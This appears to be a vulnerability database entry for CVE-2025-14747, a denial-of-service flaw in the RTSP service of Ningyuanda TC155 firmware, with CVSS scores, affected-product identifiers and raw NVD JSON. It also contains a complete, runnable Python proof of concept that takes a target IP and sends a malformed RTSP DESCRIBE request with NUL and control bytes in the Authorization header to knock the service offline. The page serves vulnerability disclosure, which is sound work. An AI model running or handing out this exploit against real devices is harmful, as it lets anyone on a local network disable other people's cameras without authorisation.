Security Vulnerability Report
CVE-2025-14747 CVSS 4.3 MEDIUM

CVE-2025-14747

Published: 2025-12-16 03:15:57
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was found in Ningyuanda TC155 57.0.2.0. The impacted element is an unknown function of the component RTSP Service. Performing manipulation results in denial of service. The attack must originate from the local network. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
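CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Note: the score and vector shown here are the Secondary CVSS 3.1 assessment in the record. The Primary CVSS 3.1 assessment in the raw JSON below rates availability impact as High (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H, base score 6.5, MEDIUM), so prioritisation based on the 4.3 figure alone understates the record's own primary rating.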

Configurations (Affected Products)

cpe:2.3:o:shenzhenningyuandatechnology:tc155_firmware:57.0.2.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:shenzhenningyuandatechnology:tc155:-:*:*:*:*:*:*:* - NOT VULNERABLE
Ningyuanda TC155 57.0.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
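#!/usr/bin/env python3
# CVE-2025-14747 PoC - Ningyuanda TC155 RTSP Service DoS
# Target: RTSP Service on Ningyuanda TC155 device
# Attack Type: Denial of Service via malformed RTSP Describe request
import socket
import sys


def send_malformed_rtsp_request(target_ip, rtsp_port=554):
    """Send one malformed RTSP DESCRIBE request and report the outcome.

    The request is a DESCRIBE whose Authorization header value contains NUL
    and control bytes.

    Args:
        target_ip: Address of the device under test.
        rtsp_port: TCP port of the RTSP service (default 554).

    Returns:
        True if the request was sent and either a reply was read or the read
        timed out; False if the connection could not be established or any
        other error occurred.
    """
    malformed_request = (
        "DESCRIBE rtsp://{}:{}/ RTSP/1.0\r\n"
        "CSeq: 1\r\n"
        "User-Agent: PoC-Exploit\r\n"
        "Accept: application/sdp\r\n"
        "Authorization: Invalid\x00\x01\x02\r\n"
        "\r\n"
    ).format(target_ip, rtsp_port)

    # Tracks whether the TCP handshake completed, so that a timeout while
    # connecting is not reported as evidence of an unresponsive service.
    connected = False
    try:
        # The context manager closes the socket on every path, including the
        # exception paths, which previously leaked the descriptor.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(5)
            sock.connect((target_ip, rtsp_port))
            connected = True
            print(f"[*] Connected to {target_ip}:{rtsp_port}")
            print("[*] Sending malformed RTSP Describe request...")
            # sendall() rather than send(): send() may transmit only part of
            # the buffer and its return value was not being checked.
            sock.sendall(malformed_request.encode('utf-8'))
            response = sock.recv(4096)
            print(f"[*] Received response: {response.decode('utf-8', errors='ignore')}")
        print("[+] Malformed request sent successfully")
        return True
    except socket.timeout:
        if not connected:
            # Nothing was sent, so this says nothing about the RTSP service.
            print("[!] Connection timeout - target unreachable, no request was sent")
            return False
        # NOTE: a read timeout only shows that no reply arrived within the
        # 5 s window. It is not by itself proof that the service crashed;
        # confirm with a normal RTSP client or the device's own status.
        print("[!] Connection timeout - service may be unresponsive (DoS successful)")
        return True
    except ConnectionRefusedError:
        print("[!] Connection refused - target may be down")
        return False
    except Exception as e:
        print(f"[!] Error: {str(e)}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 cve-2025-14747-poc.py <target_ip> [port]")
        print("Example: python3 cve-2025-14747-poc.py 192.168.1.100 554")
        sys.exit(1)

    target = sys.argv[1]
    # Reject a non-numeric or out-of-range port with a message instead of an
    # unhandled ValueError / OverflowError traceback.
    try:
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 554
    except ValueError:
        print(f"[!] Invalid port: {sys.argv[2]!r}")
        sys.exit(1)
    if not 1 <= port <= 65535:
        print(f"[!] Port out of range (1-65535): {port}")
        sys.exit(1)

    print("[*] CVE-2025-14747 PoC - Ningyuanda TC155 RTSP DoS")
    print(f"[*] Target: {target}:{port}")
    send_malformed_rtsp_request(target, port)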

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14747", "sourceIdentifier": "[email protected]", "published": "2025-12-16T03:15:57.467", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in Ningyuanda TC155 57.0.2.0. The impacted element is an unknown function of the component RTSP Service. Performing manipulation results in denial of service. The attack must originate from the local network. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": 
"NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:P", "baseScore": 3.3, "accessVector": "ADJACENT_NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 6.5, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-404"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:o:shenzhenningyuandatechnology:tc155_firmware:57.0.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "BC8CEF63-8B37-4D17-8C31-4BD41E7B8D5B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:shenzhenningyuandatechnology:tc155:-:*:*:*:*:*:*:*", "matchCriteriaId": "0DC27CA3-9706-448B-8C91-E413B1F05656"}]}]}], "references": [{"url": "https://github.com/pwnpwnpur1n/IoT-advisories/blob/main/TC155-Unauth-Malformed-RTSP-Describe-Request.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.336520", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.336520", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.707196", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}